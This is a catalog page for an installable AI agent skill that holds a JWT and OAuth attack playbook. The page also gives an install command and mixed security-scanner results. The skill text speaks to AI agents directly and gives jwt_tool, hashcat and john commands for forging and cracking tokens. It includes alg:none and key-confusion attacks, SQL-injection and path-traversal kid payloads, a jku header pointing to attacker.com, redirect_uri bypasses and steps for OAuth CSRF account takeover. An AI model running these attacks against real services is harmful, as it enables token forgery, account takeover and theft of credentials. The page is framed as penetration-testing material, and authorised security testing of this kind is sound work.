jwt-oauth-token-attacks
JWT and OAuth token attack playbook. Use when validating token trust, signing algorithms, key handling, claim abuse, bearer flows, and OAuth account-binding weaknesses.
How do I install this agent skill?
npx skills add https://github.com/yaklang/hack-skills --skill jwt-oauth-token-attacksIs this agent skill safe to install?
- Gen Agent Trust Hubpass
This skill is a playbook for security professionals to test JWT and OAuth 2.0 implementations for common vulnerabilities. It provides structured checklists and command-line examples for identifying issues like signature bypass and weak token secrets.
- Socketwarn
1 alert: gptSecurity
- Snykfail
Risk: CRITICAL · 3 issues
- ZeroLeakspass
2 findings · Score: 80/100
What does this agent skill do?
SKILL: JWT and OAuth 2.0 Token Attacks — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert authentication token attacks. Covers JWT cryptographic attacks (alg:none, RS256→HS256, secret crack, kid/jku injection), OAuth flow attacks (CSRF, open redirect, token theft, implicit flow abuse), PKCE bypass, and token leakage via Referer/logs. This is critical for modern web applications.
0. RELATED ROUTING
Use this file for token-centric attacks and flow abuse. Also load:
- oauth oidc misconfiguration for redirect URI, state, nonce, PKCE, and account-binding validation
- cors cross origin misconfiguration when browser-readable APIs or token leakage may exist cross-origin
- saml sso assertion attacks when the target uses enterprise SSO outside OAuth/OIDC
1. JWT ANATOMY
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEyMzQsInJvbGUiOiJ1c2VyIn0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
└─────────────────────┘ └────────────────────────────┘ └──────────────────────────────────────────┘
HEADER PAYLOAD SIGNATURE
Decode in terminal:
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d
# → {"alg":"HS256","typ":"JWT"}
echo "eyJ1c2VySWQiOjEyMzQsInJvbGUiOiJ1c2VyIn0" | base64 -d
# → {"userId":1234,"role":"user"}
Common claim targets (modify to escalate):
{
"role": "admin",
"isAdmin": true,
"userId": OTHER_USER_ID,
"email": "victim@target.com",
"sub": "admin",
"permissions": ["admin", "write", "delete"],
"tier": "premium"
}
2. ATTACK 1 — ALGORITHM NONE (alg:none)
Server doesn't validate signature when algorithm is "none"/"None"/"NONE":
# Burp JWT Editor / python-jwt attack:
# Step 1: Decode header
echo '{"alg":"HS256","typ":"JWT"}' | base64 → old_header
# Step 2: Create new header
echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-'
# Step 3: Modify payload (e.g., role → admin):
echo -n '{"userId":1234,"role":"admin"}' | base64 | tr -d '=' | tr '/+' '_-'
# Step 4: Construct token with empty signature:
HEADER.PAYLOAD.
# OR:
HEADER.PAYLOAD
Tool (jwt_tool):
python3 jwt_tool.py JWT_TOKEN -X a
# → automatically generates alg:none variants
3. ATTACK 2 — RS256 TO HS256 KEY CONFUSION
When server uses RS256 (asymmetric — RSA private key signs, public key verifies):
- Server's public key is often discoverable (JWKS endpoint,
/certs, source code) - Attack: tell server "this is HS256" → server verifies HS256 HMAC using the public key as secret
# Step 1: Obtain public key (PEM format)
# From: /api/.well-known/jwks.json → convert to PEM
# From: /certs endpoint
# From: OpenSSL extraction from HTTPS cert
# Step 2: Use jwt_tool to sign with HS256 using public key as secret:
python3 jwt_tool.py JWT_TOKEN -X k -pk public_key.pem
# Step 3: Manually:
# Modify header: {"alg":"HS256","typ":"JWT"}
# Sign entire header.payload with HMAC-SHA256 using PEM public key bytes
4. ATTACK 3 — JWT SECRET BRUTE FORCE
HMAC-based JWTs (HS256/HS384/HS512) with weak secret:
# hashcat (fast):
hashcat -a 0 -m 16500 "JWT_TOKEN_HERE" /usr/share/wordlists/rockyou.txt
# john:
echo "JWT_TOKEN_HERE" > jwt.txt
john --format=HMAC-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt
# jwt_tool:
python3 jwt_tool.py JWT_TOKEN -C -d /path/to/wordlist.txt
Common weak secrets to test manually:
secret, password, 123456, qwerty, changeme, your-256-bit-secret,
APP_NAME, app_name, production, jwt_secret, SECRET_KEY
5. ATTACK 4 — kid (Key ID) INJECTION
The kid header parameter specifies which key to use for verification. No sanitization = injection:
kid SQL Injection
{"alg":"HS256","kid":"' UNION SELECT 'attacker_controlled_key' FROM dual--"}
If backend queries SQL: SELECT key FROM keys WHERE kid = 'INPUT'
Result: HMAC key = 'attacker_controlled_key' → forge any payload signed with this value.
kid Path Traversal (file read)
{"alg":"HS256","kid":"../../../../dev/null"}
Server reads /dev/null as key → empty string → sign token with empty HMAC.
{"alg":"HS256","kid":"../../../../etc/hostname"}
Server reads hostname as key → forge tokens signed with hostname string.
6. ATTACK 5 — jku / x5u Header Injection
jku points to JSON Web Key Set URL. If not whitelisted:
{"alg":"RS256","jku":"https://attacker.com/malicious-jwks.json","kid":"my-key"}
Setup:
# Generate RSA key pair:
openssl genrsa -out private.pem 2048
openssl rsa -in private.pem -pubout -out public.pem
# Create JWKS:
python3 -c "
import json, base64, struct
# ... (use python-jwcrypto or jwt_tool to export JWKS)
"
# Host malicious JWKS at attacker.com/malicious-jwks.json
# Sign JWT with attacker's private key
# Server fetches attacker's JWKS → verifies with attacker's public key → accepts
jwt_tool automation:
python3 jwt_tool.py JWT -X s -ju https://attacker.com/malicious-jwks.json
7. OAUTH 2.0 — STATE PARAMETER MISSING (CSRF)
State parameter prevents CSRF in OAuth. If missing:
Attack:
1. Click "Login with Google" → OAuth starts → intercept the redirect URL:
https://accounts.google.com/oauth2/auth?client_id=APP_ID&redirect_uri=https://target.com/callback&state=MISSING_OR_PREDICTABLE&code=...
2. Get the authorization code (stop before exchanging it)
3. Craft URL: https://target.com/oauth/callback?code=ATTACKER_CODE
4. Victim clicks that URL → their session binds to ATTACKER's OAuth identity
→ ACCOUNT TAKEOVER
8. OAUTH — REDIRECT_URI BYPASS
Authorization codes are sent to redirect_uri. If validation is weak:
Open Redirect in redirect_uri
Original: redirect_uri=https://target.com/callback
Attack: redirect_uri=https://target.com/callback/../../../attacker.com
redirect_uri=https://attacker.com.target.com/callback
redirect_uri=https://target.com@attacker.com/callback
Partial Path Match
Whitelist: https://target.com/callback
Attack: https://target.com/callback%2f../admin (URL path confusion)
https://target.com/callbackXSS (prefix match only)
Localhost / Development Redirect
redirect_uri=http://localhost/steal
redirect_uri=urn:ietf:wg:oauth:2.0:oob (mobile apps)
9. OAUTH — IMPLICIT FLOW TOKEN THEFT
Implicit flow: token sent in URL fragment #access_token=...
Fragment leakage scenarios:
- Redirect to attacker page: fragment accessible via
document.referreror via<script>window.location.href</script>in target page - Open redirect:
redirect_uri=https://target.com/open-redirect?url=https://attacker.com→ token in fragment lands at attacker's page
10. OAUTH — SCOPE ESCALATION
Request broader scope than authorized in authorization code:
Authorized scope: read:profile
Attack: During token exchange, add scope=admin or scope=read:admin
→ Does server grant requested scope or issued scope?
11. TOKEN LEAKAGE VECTORS
Referer Header
Token in URL → page loads external resource → Referer leaks token:
https://target.com/dashboard#access_token=TOKEN
→ HTML loads: <img src="https://analytics.third-party.com/track">
→ Referer: https://target.com/dashboard#access_token=TOKEN
→ analytics.third-party.com sees token in Referer logs
Server Logs
Access tokens sent in query parameters are stored in:
/var/log/nginx/access.log
/var/log/apache2/access.log
ELB/ALB logs (AWS)
CloudFront logs
CDN logs
12. JWT TESTING CHECKLIST
□ Decode header + payload (base64 decode each part)
□ Identify algorithm: HS256/RS256/ES256/none
□ Modify payload fields (role, userId, isAdmin) → change signature too
□ Test alg:none → remove signature entirely
□ If RS256: find public key → attempt RS256→HS256 confusion
□ If HS256: brute force with hashcat/rockyou
□ Check kid parameter → try SQL injection + path traversal
□ Check jku/x5u header → redirect to attacker JWKS
□ Test token reuse after logout
□ Test expired token acceptance (exp claim)
□ Check for token in GET params (log leakage) vs header
13. OAUTH TESTING CHECKLIST
□ Check for state parameter in authorization request
□ Test redirect_uri manipulation (open redirect, prefix match, path confusion)
□ Can tokens be exchanged more than once?
□ Test scope escalation during token exchange
□ Implicit flow: check for token in Referer/history
□ PKCE: can code_challenge be bypassed or code_verifier be empty?
□ Check for authorization code reuse (code must be single-use)
□ Test account linking abuse: link OAuth to existing account with same email
□ Check OAuth provider confusion: use Apple ID to link where Google expected
How can the creator link this skill?
Add the canonical catalog link to the repository README so users can inspect current installs and available audits. The publishing guide covers the complete discovery path.
<a href="https://skillzs.dev/skills/yaklang/hack-skills/jwt-oauth-token-attacks">View jwt-oauth-token-attacks on skillZs</a>